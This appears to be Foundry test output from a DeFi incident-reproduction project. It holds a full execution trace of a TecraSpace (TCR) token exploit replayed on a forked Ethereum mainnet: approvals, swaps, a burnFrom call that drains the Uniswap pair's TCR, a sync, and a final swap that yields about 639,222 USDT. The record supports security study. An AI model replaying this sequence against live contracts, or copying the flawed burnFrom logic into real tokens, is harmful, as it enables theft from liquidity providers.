Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.24s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 545.02ms (3.58ms CPU time)

Ran 1 test for src/test/2022-02/TecraSpace_exp.sol:ExploitTest
[PASS] testExploit() (gas: 345812)
Logs:
  Exploiter USDT balance before attack: 0.000000
  Exploiter USDT balance after attack: 639222.253258

Traces:
  [21438] ExploitTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 14139081 [1.413e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], "USDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(TCR: [0xE38B72d6595FD3885d1D2F770aa23E94757F91a1], "TCR")
    │   └─ ← [Return]
    ├─ [0] VM::label(UniswapRoute: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], "UniswapRoute")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], "PairPool")
    │   └─ ← [Return]
    ├─ [0] VM::deal(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 40000000000000000 [4e16])
    │   └─ ← [Return]
    └─ ← [Stop]

  [396812] ExploitTest::testExploit()
    ├─ [26953] USDT::approve(UniswapRoute: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: UniswapRoute: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xa148fe3774b01d96c7f9fa0871ef8d1ba8e10a558de225107d95bbe1cefdeca9: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Stop]
    ├─ [31275] TCR::approve(UniswapRoute: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: UniswapRoute: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Stop]
    ├─ [27275] TCR::approve(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xe1ed7e30af54876a7fc0276e745d2435ea773af3d4b6500914a893ff898b3609: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Stop]
    ├─ [3031] USDT::balanceOf(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2484] USDT::decimals() [staticcall]
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Exploiter USDT balance before attack", val: 0, decimals: 6)
    ├─ [183065] UniswapRoute::swapExactETHForTokens{value: 40000000000000000}(1, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0xdAC17F958D2ee523a2206206994597C13D831ec7, 0xE38B72d6595FD3885d1D2F770aa23E94757F91a1], ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1644058476 [1.644e9])
    │   ├─ [2504] 0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852::getReserves() [staticcall]
    │   │   └─ ← [Return] 26187977136594129173941 [2.618e22], 74113962773650 [7.411e13], 1643972066 [1.643e9]
    │   ├─ [2504] PairPool::getReserves() [staticcall]
    │   │   └─ ← [Return] 645448290287 [6.454e11], 58027283904946 [5.802e13], 1643971579 [1.643e9]
    │   ├─ [23974] WETH::deposit{value: 40000000000000000}()
    │   │   ├─ emit Deposit(dst: UniswapRoute: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], wad: 40000000000000000 [4e16])
    │   │   ├─  storage changes:
    │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x000000000000000000000000000000000000000000000000008e1bc9bf040000
    │   │   └─ ← [Stop]
    │   ├─ [8062] WETH::transfer(0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852, 40000000000000000 [4e16])
    │   │   ├─ emit Transfer(from: UniswapRoute: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], to: 0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852, value: 40000000000000000 [4e16])
    │   │   ├─  storage changes:
    │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x000000000000000000000000000000000000000000000000008e1bc9bf040000 → 0
    │   │   │   @ 0xaced72359d8708e95d2112ba70e71fa267967a5588d15e7c78c1904e0debe410: 0x00000000000000000000000000000000000000000000058ba73097e20866bdb5 → 0x00000000000000000000000000000000000000000000058ba7beb3abc76abdb5
    │   │   └─ ← [Return] true
    │   ├─ [55262] 0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852::swap(0, 112863254 [1.128e8], PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], 0x)
    │   │   ├─ [22501] USDT::transfer(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], 112863254 [1.128e8])
    │   │   │   ├─ emit Transfer(from: 0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852, to: PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], value: 112863254 [1.128e8])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x45b1147656da4d940c556082f0e09e91e3d046c1c84468f8ead64d8fdc1c749a: 0x00000000000000000000000000000000000000000000000000004368006c8c92 → 0x00000000000000000000000000000000000000000000000000004367f9b2647c
    │   │   │   │   @ 0xbba62fc2a223d53ad4724ed4e2fae3c58b9b5bf8a4cb739b11ab48eafa7c9080: 0x0000000000000000000000000000000000000000000000000000009647b74fef → 0x000000000000000000000000000000000000000000000000000000964e717805
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] WETH::balanceOf(0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852) [staticcall]
    │   │   │   └─ ← [Return] 26188017136594129173941 [2.618e22]
    │   │   ├─ [1031] USDT::balanceOf(0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852) [staticcall]
    │   │   │   └─ ← [Return] 74113849910396 [7.411e13]
    │   │   ├─ emit Sync(reserve0: 26188017136594129173941 [2.618e22], reserve1: 74113849910396 [7.411e13])
    │   │   ├─ emit Swap(sender: UniswapRoute: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 40000000000000000 [4e16], amount1In: 0, amount0Out: 0, amount1Out: 112863254 [1.128e8], to: PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x61fd05e200000000000000004368006c8c9200000000058ba73097e20866bdb5 → 0x61fd05ec00000000000000004367f9b2647c00000000058ba7beb3abc76abdb5
    │   │   │   @ 9: 0x0000000000000000000000000000000000001a9619285264d08b95af6f76a26c → 0x0000000000000000000000000000000000001a9619a1df68464b501b742f6f30
    │   │   │   @ 10: 0x0000000000000000000000fff2d3f737ed14fbb470f9bf53145e0ae99e59e13e → 0x0000000000000000000000fff2d4c9d47677a044d961f3258389c4f4a330bc7e
    │   │   └─ ← [Stop]
    │   ├─ [64136] PairPool::swap(0, 10114462474 [1.011e10], ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [30918] TCR::transfer(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10114462474 [1.011e10])
    │   │   │   ├─ emit Transfer(from: PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], to: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10114462474 [1.011e10])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x8e45af820b063f6c85f9b2beca26e314c6915b2546f12dc1d04037774be1fd99: 0x000000000000000000000000000000000000000000000000000034c687a4f9b2 → 0x000000000000000000000000000000000000000000000000000034c42cc686a8
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 0x000000000000000000000000000000000000000000000000000000025ade730a
    │   │   │   └─ ← [Return] true
    │   │   ├─ [1031] USDT::balanceOf(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4]) [staticcall]
    │   │   │   └─ ← [Return] 645561153541 [6.455e11]
    │   │   ├─ [864] TCR::balanceOf(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4]) [staticcall]
    │   │   │   └─ ← [Return] 58017169442472 [5.801e13]
    │   │   ├─ emit Sync(reserve0: 645561153541 [6.455e11], reserve1: 58017169442472 [5.801e13])
    │   │   ├─ emit Swap(sender: UniswapRoute: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 112863254 [1.128e8], amount1In: 0, amount0Out: 0, amount1Out: 10114462474 [1.011e10], to: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x61fd03fb000000000000000034c687a4f9b20000000000000000009647b74fef → 0x61fd05ec000000000000000034c42cc686a8000000000000000000964e717805
    │   │   │   @ 9: 0x000000000000000000000000000079763ec589a60566f3d3e0b976c2254341a0 → 0x00000000000000000000000000007976ed4efab3fc5fefa2429b074f6dc98fdb
    │   │   │   @ 10: 0x00000000000000000000000000000005c820e28a74e69a649492fc676def70b8 → 0x00000000000000000000000000000005c82669c41e5189d4b532aea4e183269d
    │   │   └─ ← [Stop]
    │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000003000000000000000000000000000000000000000000000000008e1bc9bf0400000000000000000000000000000000000000000000000000000000000006ba2816000000000000000000000000000000000000000000000000000000025ade730a
    ├─ [864] TCR::balanceOf(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4]) [staticcall]
    │   └─ ← [Return] 58017169442472 [5.801e13]
    ├─ [11608] TCR::burnFrom(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], 58017069442472 [5.801e13])
    │   ├─ emit Approval(owner: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], value: 115792089237316195423570985008687907853269984665640564039457583949896060197463 [1.157e77])
    │   ├─ emit Transfer(from: PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], to: 0x0000000000000000000000000000000000000000, value: 58017069442472 [5.801e13])
    │   ├─  storage changes:
    │   │   @ 0: 0x00000000000000000000000000000000000000000000000000005abacc41d109 → 0x000000000000000000000000000000000000000000000000000025f6a5712b61
    │   │   @ 0xe1ed7e30af54876a7fc0276e745d2435ea773af3d4b6500914a893ff898b3609: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffcb3bd92f5a57
    │   │   @ 0x8e45af820b063f6c85f9b2beca26e314c6915b2546f12dc1d04037774be1fd99: 0x000000000000000000000000000000000000000000000000000034c42cc686a8 → 0x0000000000000000000000000000000000000000000000000000000005f5e100
    │   └─ ← [Stop]
    ├─ [864] TCR::balanceOf(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10114462474 [1.011e10]
    ├─ [8413] PairPool::sync()
    │   ├─ [1031] USDT::balanceOf(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4]) [staticcall]
    │   │   └─ ← [Return] 645561153541 [6.455e11]
    │   ├─ [864] TCR::balanceOf(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4]) [staticcall]
    │   │   └─ ← [Return] 100000000 [1e8]
    │   ├─ emit Sync(reserve0: 645561153541 [6.455e11], reserve1: 100000000 [1e8])
    │   ├─  storage changes:
    │   │   @ 8: 0x61fd05ec000000000000000034c42cc686a8000000000000000000964e717805 → 0x61fd05ec0000000000000000000005f5e100000000000000000000964e717805
    │   └─ ← [Stop]
    ├─ [54079] UniswapRoute::swapExactTokensForTokens(10114462474 [1.011e10], 1, [0xE38B72d6595FD3885d1D2F770aa23E94757F91a1, 0xdAC17F958D2ee523a2206206994597C13D831ec7], ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1644058476 [1.644e9])
    │   ├─ [504] PairPool::getReserves() [staticcall]
    │   │   └─ ← [Return] 645561153541 [6.455e11], 100000000 [1e8], 1643972076 [1.643e9]
    │   ├─ [5080] TCR::transferFrom(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], 10114462474 [1.011e10])
    │   │   ├─ emit Transfer(from: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], value: 10114462474 [1.011e10])
    │   │   ├─  storage changes:
    │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x000000000000000000000000000000000000000000000000000000025ade730a → 0
    │   │   │   @ 0x8e45af820b063f6c85f9b2beca26e314c6915b2546f12dc1d04037774be1fd99: 0x0000000000000000000000000000000000000000000000000000000005f5e100 → 0x0000000000000000000000000000000000000000000000000000000260d4540a
    │   │   └─ ← [Return] true
    │   ├─ [40676] PairPool::swap(639222253258 [6.392e11], 0, ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [26801] USDT::transfer(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 639222253258 [6.392e11])
    │   │   │   ├─ emit Transfer(from: PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4], to: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 639222253258 [6.392e11])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xbba62fc2a223d53ad4724ed4e2fae3c58b9b5bf8a4cb739b11ab48eafa7c9080: 0x000000000000000000000000000000000000000000000000000000964e717805 → 0x0000000000000000000000000000000000000000000000000000000179d3f13b
    │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x00000000000000000000000000000000000000000000000000000094d49d86ca
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1031] USDT::balanceOf(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4]) [staticcall]
    │   │   │   └─ ← [Return] 6338900283 [6.338e9]
    │   │   ├─ [864] TCR::balanceOf(PairPool: [0x420725A69E79EEffB000F98Ccd78a52369b6C5d4]) [staticcall]
    │   │   │   └─ ← [Return] 10214462474 [1.021e10]
    │   │   ├─ emit Sync(reserve0: 6338900283 [6.338e9], reserve1: 10214462474 [1.021e10])
    │   │   ├─ emit Swap(sender: UniswapRoute: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 0, amount1In: 10114462474 [1.011e10], amount0Out: 639222253258 [6.392e11], amount1Out: 0, to: ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x61fd05ec0000000000000000000005f5e100000000000000000000964e717805 → 0x61fd05ec0000000000000000000260d4540a0000000000000000000179d3f13b
    │   │   └─ ← [Stop]
    │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000025ade730a00000000000000000000000000000000000000000000000000000094d49d86ca
    ├─ [1031] USDT::balanceOf(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 639222253258 [6.392e11]
    ├─ [484] USDT::decimals() [staticcall]
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Exploiter USDT balance after attack", val: 639222253258 [6.392e11], decimals: 6)
    ├─  storage changes:
    │   @ 12: 0 → 1
    │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0: 0x00000000000000000000000000000000000000000000000000005abacc41d109 → 0x000000000000000000000000000000000000000000000000000025f6a5712b61
    │   @ 0xe1ed7e30af54876a7fc0276e745d2435ea773af3d4b6500914a893ff898b3609: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 12.07s (10.50s CPU time)

Ran 2 test suites in 12.09s (12.62s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
